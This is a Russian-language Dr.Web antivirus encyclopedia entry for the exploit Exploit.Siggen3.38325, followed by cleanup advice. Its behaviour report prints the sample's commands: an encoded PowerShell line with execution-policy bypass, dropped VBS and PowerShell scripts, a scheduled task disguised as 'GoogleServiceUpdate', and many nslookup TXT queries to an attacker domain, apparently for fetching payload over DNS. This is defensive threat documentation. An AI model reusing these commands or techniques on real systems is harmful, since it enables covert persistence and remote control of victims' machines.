Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Exploit.Siggen3.38325

Добавлен в вирусную базу Dr.Web: 2022-11-24

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
  • <SYSTEM32>\tasks\googleserviceupdate
Вредоносные функции
Запускает на исполнение (эксплоит)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -Enc JABwAGEAdABoAD0AIAAiACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAXABhAHAAcABkAGEAdABhAFwAbABvAGMAYQBsAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACIADQAKAA0ACgBpAGYAKAAtAG4...
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\u1848931.tmp
  • <Текущая директория>\a2d11000
  • %LOCALAPPDATA%\microsoft\windows\l69742.vbs
  • %LOCALAPPDATA%\microsoft\windows\mc.ps1
Подменяет следующие файлы
  • <PATH_SAMPLE>.xls
Сетевая активность
UDP
  • DNS ASK rn#######_770165328.yjksdrl.tk
  • DNS ASK rn#######_217492910.yjksdrl.tk
  • DNS ASK rn#######_685766425.yjksdrl.tk
  • DNS ASK rn#######_1743878884.yjksdrl.tk
  • DNS ASK rn#######_1101709518.yjksdrl.tk
  • DNS ASK rn#######_1281383812.yjksdrl.tk
  • DNS ASK rn#######_822331294.yjksdrl.tk
  • DNS ASK rn#######_1879689400.yjksdrl.tk
  • DNS ASK rn#######_496269074.yjksdrl.tk
  • DNS ASK rn#######_299672840.yjksdrl.tk
  • DNS ASK rn#######_403112878.yjksdrl.tk
  • DNS ASK rn#######_1457443451.yjksdrl.tk
  • DNS ASK rn#######_1079781535.yjksdrl.tk
  • DNS ASK rn#######_1456281949.yjksdrl.tk
  • DNS ASK rn#######_1537676273.yjksdrl.tk
  • DNS ASK rn#######_1929719954.yjksdrl.tk
  • DNS ASK rn#######_1882019252.yjksdrl.tk
  • DNS ASK rn#######_1583574264.yjksdrl.tk
  • DNS ASK rn#######_622458033.yjksdrl.tk
  • DNS ASK rn#######_268226786.yjksdrl.tk
  • DNS ASK rn#######_1737108452.yjksdrl.tk
  • DNS ASK rn#######_1343454529.yjksdrl.tk
  • DNS ASK rn#######_908806277.yjksdrl.tk
  • DNS ASK rn#######_221918990.yjksdrl.tk
  • DNS ASK rn#######_1380509369.yjksdrl.tk
  • DNS ASK rn#######_800747656.yjksdrl.tk
  • DNS ASK rn#######_2009721166.yjksdrl.tk
  • DNS ASK rn#######_1560260780.yjksdrl.tk
  • DNS ASK rn#######_1213078211.yjksdrl.tk
  • DNS ASK rn#######_1230602153.yjksdrl.tk
  • DNS ASK rn#######_64517479.yjksdrl.tk
  • DNS ASK rn#######_1706199858.yjksdrl.tk
  • DNS ASK rn#######_1481799748.yjksdrl.tk
  • DNS ASK rn#######_471135854.yjksdrl.tk
  • DNS ASK rn#######_1616555493.yjksdrl.tk
  • DNS ASK rn#######_976976374.yjksdrl.tk
  • DNS ASK rn#######_1775286265.yjksdrl.tk
  • DNS ASK rn#######_1625514888.yjksdrl.tk
  • DNS ASK rn#######_1930155489.yjksdrl.tk
  • DNS ASK rn#######_1385265958.yjksdrl.tk
  • DNS ASK rn#######_782633473.yjksdrl.tk
  • DNS ASK rn#######_2011159675.yjksdrl.tk
  • DNS ASK rn#######_1016018278.yjksdrl.tk
  • DNS ASK rn#######_1333311435.yjksdrl.tk
  • DNS ASK rn#######_877306961.yjksdrl.tk
  • DNS ASK rn#######_564451308.yjksdrl.tk
  • DNS ASK rn#######_1533942296.yjksdrl.tk
  • DNS ASK rn#######_217140874.yjksdrl.tk
  • DNS ASK rn#######_1674653720.yjksdrl.tk
  • DNS ASK rn#######_773702381.yjksdrl.tk
  • DNS ASK rn#######_1818166261.yjksdrl.tk
  • DNS ASK rn#######_602766036.yjksdrl.tk
  • DNS ASK rn#######_125714474.yjksdrl.tk
  • DNS ASK rn#######_1179834360.yjksdrl.tk
Другое
Создает и запускает на исполнение
  • '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\microsoft\Windows\L69742.vbs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -exec bypass -file %LOCALAPPDATA%\microsoft\Windows\mc.ps1
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -Enc JABwAGEAdABoAD0AIAAiACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAXABhAHAAcABkAGEAdABhAFwAbABvAGMAYQBsAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACIADQAKAA0ACgBpAGYAKAAtAG4...' (со скрытым окном)
  • '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\microsoft\Windows\L69742.vbs"' (со скрытым окном)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -exec bypass -file %LOCALAPPDATA%\microsoft\Windows\mc.ps1' (со скрытым окном)
Запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /c "schtasks /create /F /sc minute /mo 2 /tn "GoogleServiceUpdate" /tr "\"%LOCALAPPDATA%\microsoft\Windows\L69742.vbs"\" "
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1281383812.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_822331294.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1879689400.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_496269074.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_299672840.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_403112878.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1079781535.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1385265958.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1456281949.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1537676273.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1929719954.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1882019252.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1583574264.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1743878884.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1101709518.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_622458033.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_268226786.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_249216864.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_681052092.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1843962339.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_651740346.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1559919539.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_217140874.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_439375830.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_553024454.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1310960802.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1179834360.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1930155489.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_908806277.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1343454529.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1737108452.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_685766425.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_217492910.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1380509369.yjksdrl.tk
  • '<SYSTEM32>\taskeng.exe' {FF469705-BECF-422F-90A4-7B3CA8E497FC} S-1-5-21-1960123792-2022915161-3775307078-1001:nitmwzw\user:Interactive:[1]
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_770165328.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_602766036.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1213078211.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1230602153.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_64517479.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1706199858.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1481799748.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_471135854.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1616555493.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_976976374.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1775286265.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1625514888.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_782633473.yjksdrl.tk
  • '<SYSTEM32>\schtasks.exe' /create /F /sc minute /mo 2 /tn "GoogleServiceUpdate" /tr "\"%LOCALAPPDATA%\microsoft\Windows\L69742.vbs"\"
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1457443451.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_221918990.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_125714474.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_2011159675.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1016018278.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1333311435.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_877306961.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_564451308.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1075595963.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1533942296.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_236046124.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_773702381.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1818166261.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1560260780.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_2009721166.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_800747656.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_1674653720.yjksdrl.tk
  • '<SYSTEM32>\nslookup.exe' -q=TXT rne_41255_759483464.yjksdrl.tk

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке